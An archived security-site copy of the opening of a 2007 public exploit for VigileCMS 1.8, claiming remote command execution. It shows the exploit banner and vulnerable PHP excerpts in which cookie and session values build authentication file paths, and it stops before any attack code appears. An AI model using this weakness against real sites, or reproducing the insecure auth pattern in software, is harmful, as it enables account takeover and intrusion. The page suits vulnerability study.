Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb13548.htm

VigileCMS <= 1.8 Stealth



VigileCMS <= 1.8 Stealth
VigileCMS <= 1.8 Stealth



#!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
'''=0D
------------------------------------------------------------------------------------------------=0D
 ____            __________         __             ____  __   =0D
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ =0D
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\=0D
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  =0D
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  =0D
          \/\______|      \/     \/                         =0D
=0D
------------------------------------------------------------------------------------------------=0D
This is a Public Exploit. 22/11/2007 (dd-mm-yyyy)=0D
------------------------------------------------------------------------------------------------=0D
=A7 0day VigileCMS <= 1.8 Stealth - Remote Command Execution =A7=0D
Vendor:	 http://www.vigilenapoletano.it=0D 
Severity: Highest=0D
Author:	  The:Paradox=0D
Italy r0x.=0D
=0D
Visit inj3ct-it.org=0D
=0D
Comments: This exploit was coded to show some people what a real vulnerability is. =0D
------------------------------------------------------------------------------------------------=0D
Related Codes:=0D
=0D
--- index.php; line 64:=0D
=0D
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {=0D
    if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){=0D
        $_SESSION[user] = $_COOKIE[rem_user];=0D
        $_SESSION[pass] = $_COOKIE[rem_pass];=0D
        logthis("$_SESSION[user] si =E8 collegato al Sito: riconosciuto con Cookie!");=0D
        UserVisita ();// aggiornamento database utente per numero di visite=0D
    }=0D
}=0D
=0D
--- func.inc.php; line 93:=0D
=0D
function is_admin(){ 	//## FUNCTION ##=0D
    if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){=0D
	return true;=0D
    } else {=0D
        return false;=0D
    }=0D
}=0D
=0D
--- func.inc.php; line 109:=0D
=0D
function is_superadmin(){ 	//## FUNCTION ##=0D
    include (LOGS_TAB."/creazione.php");=0D
    if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {=0D
	return true;=0D
    } else {=0D
        return false;=0D
    }=0D
}=0D
=0D
--- vedipm.php; line 210:=0D
=0D
            if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";=0D
=0D
=0D
=0D
            $_POST[ttl] =stripslashes($_POST[ttl]);=0D
=0D
            $_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH